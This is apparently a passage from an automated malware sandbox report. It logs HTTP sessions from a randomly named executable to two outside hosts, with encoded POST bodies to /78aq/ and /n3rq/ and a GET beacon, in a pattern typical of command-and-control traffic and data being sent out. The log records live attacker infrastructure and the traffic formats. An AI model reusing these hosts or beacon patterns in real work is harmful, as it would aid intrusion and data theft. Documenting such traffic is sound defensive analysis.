                                                              Sep 12, 2024 15:07:46.266565084 CEST701OUTPOST /78aq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.sssqqq07-22.fun
                                                              Origin: http://www.sssqqq07-22.fun
                                                              Referer: http://www.sssqqq07-22.fun/78aq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 39 6c 63 2b 73 6b 6a 45 57 71 72 4e 75 4e 35 4f 42 49 4b 30 53 2f 78 45 65 4e 6c 34 67 34 70 57 68 71 47 43 66 65 38 35 35 2b 38 50 4e 30 71 36 30 33 48 58 6e 43 6c 54 59 6c 73 43 4d 57 34 44 6e 56 4f 73 62 6c 32 68 4d 57 45 74 52 43 41 59 7a 6c 31 72 77 2b 52 43 37 42 53 6c 48 45 7a 72 51 66 7a 49 56 74 6f 46 69 56 57 33 57 54 45 79 36 61 46 36 36 4b 61 70 38 71 57 5a 51 4f 68 66 4b 65 59 6c 73 48 76 34 34 70 68 63 57 4b 69 2f 51 73 39 52 57 7a 67 43 7a 46 30 64 76 78 31 6d 67 70 54 64 55 67 34 70 32 49 36 79 7a 67 42 32 33 7a 45 4f 6c 57 4b 41 4b 6b 4f 5a 2f 4b 30 79 74 51 3d 3d
                                                              Data Ascii: 3tV=9lc+skjEWqrNuN5OBIK0S/xEeNl4g4pWhqGCfe855+8PN0q603HXnClTYlsCMW4DnVOsbl2hMWEtRCAYzl1rw+RC7BSlHEzrQfzIVtoFiVW3WTEy6aF66Kap8qWZQOhfKeYlsHv44phcWKi/Qs9RWzgCzF0dvx1mgpTdUg4p2I6yzgB23zEOlWKAKkOZ/K0ytQ==
                                                              Sep 12, 2024 15:07:47.151875019 CEST492INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Thu, 12 Sep 2024 13:07:54 GMT
                                                              Connection: close
                                                              Content-Length: 315
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.44977645.113.201.77805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:48.807373047 CEST721OUTPOST /78aq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.sssqqq07-22.fun
                                                              Origin: http://www.sssqqq07-22.fun
                                                              Referer: http://www.sssqqq07-22.fun/78aq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 39 6c 63 2b 73 6b 6a 45 57 71 72 4e 2f 65 68 4f 4e 4f 43 30 54 66 78 48 56 74 6c 34 76 59 70 53 68 71 4b 43 66 66 70 38 35 4c 73 50 4d 52 57 36 31 7a 72 58 69 43 6c 54 41 31 74 47 54 47 34 49 6e 56 53 6b 62 68 32 68 4d 57 51 74 52 44 77 59 30 57 64 6f 7a 4f 52 45 75 52 53 6e 49 6b 7a 72 51 66 7a 49 56 74 73 76 69 56 75 33 56 6a 30 79 35 37 46 35 35 4b 61 71 37 71 57 5a 55 4f 67 55 4b 65 5a 77 73 47 79 74 34 71 5a 63 57 4c 53 2f 54 35 42 4f 42 6a 67 49 35 6c 31 4f 68 41 63 66 75 4a 6d 30 63 79 38 4b 77 5a 65 6c 32 6d 51 73 6d 43 6c 5a 33 57 75 7a 58 6a 48 74 79 4a 4a 37 32 54 4b 31 53 38 74 38 71 5a 6d 6a 6f 4c 4c 53 73 57 56 67 6a 6e 55 3d
                                                              Data Ascii: 3tV=9lc+skjEWqrN/ehONOC0TfxHVtl4vYpShqKCffp85LsPMRW61zrXiClTA1tGTG4InVSkbh2hMWQtRDwY0WdozOREuRSnIkzrQfzIVtsviVu3Vj0y57F55Kaq7qWZUOgUKeZwsGyt4qZcWLS/T5BOBjgI5l1OhAcfuJm0cy8KwZel2mQsmClZ3WuzXjHtyJJ72TK1S8t8qZmjoLLSsWVgjnU=
                                                              Sep 12, 2024 15:07:49.683084011 CEST492INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Thu, 12 Sep 2024 13:07:57 GMT
                                                              Connection: close
                                                              Content-Length: 315
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.44977745.113.201.77805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:51.355828047 CEST10803OUTPOST /78aq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.sssqqq07-22.fun
                                                              Origin: http://www.sssqqq07-22.fun
                                                              Referer: http://www.sssqqq07-22.fun/78aq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 39 6c 63 2b 73 6b 6a 45 57 71 72 4e 2f 65 68 4f 4e 4f 43 30 54 66 78 48 56 74 6c 34 76 59 70 53 68 71 4b 43 66 66 70 38 35 4c 6b 50 4e 6b 61 36 7a 53 72 58 6c 43 6c 54 65 6c 74 4c 54 47 34 56 6e 56 61 67 62 68 37 55 4d 56 6f 74 41 52 49 59 78 6e 64 6f 6b 65 52 45 73 52 53 36 48 45 79 70 51 66 6a 4d 56 73 63 76 69 56 75 33 56 68 63 79 76 61 46 35 2f 4b 61 70 38 71 57 46 51 4f 67 38 4b 65 52 67 73 48 47 39 34 36 35 63 57 72 43 2f 56 4c 70 4f 65 54 67 4f 36 6c 30 4a 68 41 41 2b 75 4a 36 65 63 7a 59 77 77 61 43 6c 36 54 6c 32 37 52 64 32 6a 67 6d 77 43 53 36 4b 73 2b 39 36 79 6b 2f 4c 55 4f 39 4f 6f 4e 6d 70 6b 37 47 4f 2f 56 56 6c 38 44 56 38 68 32 43 35 64 4b 53 66 49 76 74 73 42 50 41 59 30 76 35 78 6b 32 67 64 61 70 69 56 52 59 6d 48 65 79 6f 75 72 34 34 48 44 2b 5a 6c 65 56 4b 66 6f 6c 42 45 73 2f 77 6a 74 65 63 53 51 43 70 6c 75 42 58 6e 52 75 72 43 72 4d 6a 4c 6f 32 2f 39 67 31 58 46 38 74 48 44 51 5a 42 39 31 5a 70 64 48 52 71 62 47 51 6b 64 69 48 56 4a 37 58 70 62 4f 56 32 32 2b 6f [TRUNCATED]
                                                              Data Ascii: 3tV=9lc+skjEWqrN/ehONOC0TfxHVtl4vYpShqKCffp85LkPNka6zSrXlClTeltLTG4VnVagbh7UMVotARIYxndokeREsRS6HEypQfjMVscviVu3VhcyvaF5/Kap8qWFQOg8KeRgsHG9465cWrC/VLpOeTgO6l0JhAA+uJ6eczYwwaCl6Tl27Rd2jgmwCS6Ks+96yk/LUO9OoNmpk7GO/VVl8DV8h2C5dKSfIvtsBPAY0v5xk2gdapiVRYmHeyour44HD+ZleVKfolBEs/wjtecSQCpluBXnRurCrMjLo2/9g1XF8tHDQZB91ZpdHRqbGQkdiHVJ7XpbOV22+orGCZfTrtMOL0x7BGNHxPBnDIXu6NDDEc6dN8ge1KPh8KXjSXS5nVgfVwOpPTCKYH2zg38iIE/otkw9aTWZWiCntsOB9LKE9XVjLUe9g90KeCnWgINalXNJisg0XzprApEHxwLf5lvyor8BwG8er9NtM6yLD6I3UeNfFpIByO8qqyyLA3AHi1a6JfM6GVol7ftA8B13okgL3q7BSEwadnNkN8vVk53KXlt878opKPtgR09pAZPiUUn1J7r6zEHkwNPJPxtvehJFyt/5xAN0XJNp9GcYzqO3eAgbmNYy68WCm5icTWKcKOkdYGq2uAP+yDny+ykg0werRJ1aaVQeDm2uqEDMCBrG6RTEe086kZY09Ke86ZQ253MbqDeFyIH1HLT6psKPgx9iRgLpR/Dsb2MYLNWKUieSGlb/ql8CtZje5r1R2g072Iq58MFD4rKfY1ugzAP4yLj81A8Eg/GtiYAQc05fGTdXnX4VUD2OoBn3fgbxbO4XdPfZRO9nAkXjELKXAu3IYlIBs39+2evai2ReauZ+jG4xvTUYli2XQfWLFvonzMaiH3yxxdkhTZaftAKYXPt1UzaWViBUJoCz8ZtXBtdFM3IWBxGxAUChCPu7GSu5a1fVsfojjkrtFCMINiAlD147AXU9gBHoj4S2S09bjxvXQU1Zh2+u [TRUNCATED]
                                                              Sep 12, 2024 15:07:52.206064939 CEST492INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Thu, 12 Sep 2024 13:07:59 GMT
                                                              Connection: close
                                                              Content-Length: 315
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.44977845.113.201.77805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:07:54.644417048 CEST434OUTGET /78aq/?IhkTb=xPfHG0o8kZI8&3tV=wn0evRzkTpjhxs8ZI7f7bdp7QNRPmMli5Za2X/d72voTd3Hgl3DgiTlHV2cFEBs8tUuCcCOjEkMrQzdfzw17g/NW6ia3GXbmRujRfaIyiSnkayos5qIY2c4= HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.sssqqq07-22.fun
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:55.525688887 CEST492INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Thu, 12 Sep 2024 13:08:03 GMT
                                                              Connection: close
                                                              Content-Length: 315
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.44977976.223.113.161805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:00.604260921 CEST692OUTPOST /n3rq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Referer: http://www.justlivn.net/n3rq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 4e 71 4d 38 57 4b 73 4a 43 32 69 61 46 77 4b 65 43 4f 44 4f 70 53 68 59 76 66 53 55 69 37 52 4b 42 55 6c 5a 56 33 56 66 4d 31 71 48 69 2b 55 57 31 70 79 78 72 61 2b 50 38 73 7a 51 6a 51 44 76 51 65 4a 46 61 2f 4c 6b 45 75 57 76 44 69 2b 6d 52 6b 65 66 59 73 4d 68 78 37 30 55 5a 37 5a 45 44 5a 53 6b 76 41 74 56 4c 75 6d 62 45 66 36 78 61 77 5a 44 50 61 65 53 50 6b 75 42 68 57 62 67 33 6a 62 30 75 32 6d 48 6b 59 2b 6f 63 75 4d 4d 77 59 6e 69 79 74 59 75 32 72 64 64 73 42 5a 65 47 37 2f 4e 65 6d 61 47 35 33 52 76 70 69 44 44 6f 65 50 2b 55 38 66 76 44 58 5a 67 34 65 39 44 44 41 3d 3d
                                                              Data Ascii: 3tV=NqM8WKsJC2iaFwKeCODOpShYvfSUi7RKBUlZV3VfM1qHi+UW1pyxra+P8szQjQDvQeJFa/LkEuWvDi+mRkefYsMhx70UZ7ZEDZSkvAtVLumbEf6xawZDPaeSPkuBhWbg3jb0u2mHkY+ocuMMwYniytYu2rddsBZeG7/NemaG53RvpiDDoeP+U8fvDXZg4e9DDA==
                                                              Sep 12, 2024 15:08:01.062894106 CEST208INHTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Thu, 12 Sep 2024 13:08:01 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.44978076.223.113.161805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:03.156893015 CEST712OUTPOST /n3rq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Referer: http://www.justlivn.net/n3rq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 4e 71 4d 38 57 4b 73 4a 43 32 69 61 45 51 36 65 41 74 72 4f 73 79 68 66 6a 2f 53 55 74 62 52 4f 42 55 35 5a 56 7a 45 61 4d 44 53 48 73 2f 6b 57 30 6f 79 78 6d 36 2b 50 79 4d 7a 56 2b 41 44 61 51 65 55 79 61 2b 62 6b 45 75 43 76 44 6a 4f 6d 52 54 79 63 5a 38 4d 6a 37 72 30 61 47 72 5a 45 44 5a 53 6b 76 41 35 76 4c 76 4f 62 48 76 4b 78 62 52 5a 41 43 36 65 4e 48 45 75 42 73 32 61 49 33 6a 62 61 75 33 37 50 6b 62 47 6f 63 72 77 4d 78 4a 6e 68 6c 64 59 6f 6f 72 63 75 39 42 77 35 4b 37 75 57 55 57 47 53 77 33 6b 4f 6c 45 53 5a 35 76 75 70 47 38 37 63 65 51 51 55 31 64 41 4b 59 4d 74 61 79 55 59 59 4f 32 5a 54 30 2b 6f 64 2b 6e 68 32 36 2f 73 3d
                                                              Data Ascii: 3tV=NqM8WKsJC2iaEQ6eAtrOsyhfj/SUtbROBU5ZVzEaMDSHs/kW0oyxm6+PyMzV+ADaQeUya+bkEuCvDjOmRTycZ8Mj7r0aGrZEDZSkvA5vLvObHvKxbRZAC6eNHEuBs2aI3jbau37PkbGocrwMxJnhldYoorcu9Bw5K7uWUWGSw3kOlESZ5vupG87ceQQU1dAKYMtayUYYO2ZT0+od+nh26/s=
                                                              Sep 12, 2024 15:08:03.599111080 CEST208INHTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Thu, 12 Sep 2024 13:08:03 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.44978176.223.113.161805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:05.744869947 CEST10794OUTPOST /n3rq/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Referer: http://www.justlivn.net/n3rq/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 4e 71 4d 38 57 4b 73 4a 43 32 69 61 45 51 36 65 41 74 72 4f 73 79 68 66 6a 2f 53 55 74 62 52 4f 42 55 35 5a 56 7a 45 61 4d 41 79 48 73 4d 38 57 31 4c 71 78 70 61 2b 50 73 63 7a 55 2b 41 44 48 51 65 4d 32 61 2b 58 30 45 74 36 76 46 78 71 6d 47 33 6d 63 41 4d 4d 6a 31 37 30 62 5a 37 5a 52 44 5a 43 67 76 41 70 76 4c 76 4f 62 48 74 53 78 63 41 5a 41 52 4b 65 53 50 6b 76 41 68 57 62 6c 33 6c 7a 73 75 30 57 74 6e 71 6d 6f 63 50 73 4d 79 36 50 68 35 4e 59 71 38 4c 63 32 39 42 73 6d 4b 36 43 61 55 56 61 34 77 30 34 4f 6d 79 72 6f 74 74 2b 49 58 36 58 50 4f 69 4a 79 7a 74 34 49 63 73 49 75 30 31 45 42 54 58 52 37 77 75 46 74 71 54 63 39 6c 62 71 4d 2f 62 32 47 48 70 42 67 4d 63 37 31 74 6f 68 72 66 2b 4d 55 43 7a 6c 38 71 4b 78 62 36 4e 70 4c 67 53 44 6f 77 32 62 64 73 63 67 30 4b 6f 55 7a 36 63 48 38 48 6c 63 72 2b 41 37 50 7a 38 6d 50 34 41 48 73 4a 47 33 46 75 43 2b 76 64 36 79 45 51 6b 64 48 65 6b 35 78 6d 71 32 64 4e 2b 73 45 33 56 32 38 2f 69 48 72 55 36 2f 50 77 68 70 49 4f 52 54 36 6a 32 [TRUNCATED]
                                                              Data Ascii: 3tV=NqM8WKsJC2iaEQ6eAtrOsyhfj/SUtbROBU5ZVzEaMAyHsM8W1Lqxpa+PsczU+ADHQeM2a+X0Et6vFxqmG3mcAMMj170bZ7ZRDZCgvApvLvObHtSxcAZARKeSPkvAhWbl3lzsu0WtnqmocPsMy6Ph5NYq8Lc29BsmK6CaUVa4w04Omyrott+IX6XPOiJyzt4IcsIu01EBTXR7wuFtqTc9lbqM/b2GHpBgMc71tohrf+MUCzl8qKxb6NpLgSDow2bdscg0KoUz6cH8Hlcr+A7Pz8mP4AHsJG3FuC+vd6yEQkdHek5xmq2dN+sE3V28/iHrU6/PwhpIORT6j2CILLheXkrwoo4CO7SmJnm6xDKenmZ8PvNQad0/wCYannlD/sgKIneuVlzAco9VKXl2ZEKEyjSEmNZQhU/B0xIGWIS3LxVqL8sy1VKuQIk3BMYp0h4kx/ZQP/AjmNebSgl2Lb5rFBpKmW5cDBKKcFt2olJMDuyWHJQXZuILlloUWl53bUhC+gsaNAx2po2r/mwP0yZobiY4nN7F6HXx8v4B2nXGonvbka79RwVEHUjaqd9sEZTtsWINVouKCzFxn6l3Xz0nUX2PTMkAjyv72fzIPLLyOtEBVzv9QlweDfUnywxwI19E1sP66U6KDybOtYnLcb7miVxx7l94ezYv4lU4VxKXQU/beILOnXa/nlDbAMou0ieib8gDpOiJKRcghOG4ZeGCN7n3gMfXN2eCRUese/a9ug1m+CXjVCwl53fUi/6snWtxUhlBzO9kPkBE9ZuJudlSmmatQrkdYSi6bFB7+ItugwUOCHM23o+TtAGbqOvBgyOwkbNqJnZx6CqFkclLXOay6YYTmqdc9nLK0oLvnjD6VOJJjD6v5/OIVl9ayc4H1kfdKfA99Z3+inL5WOld1+56xxCetV/Hzf0/JR9UxgINZV4D1ScVK2gHwkLfRUTFVG8jJG3E21wcIWiOomFZmK+7Ae5Rg4H6wM/KS8+auUp88H6KhBxF [TRUNCATED]
                                                              Sep 12, 2024 15:08:06.206929922 CEST208INHTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Thu, 12 Sep 2024 13:08:06 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.44978276.223.113.161805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
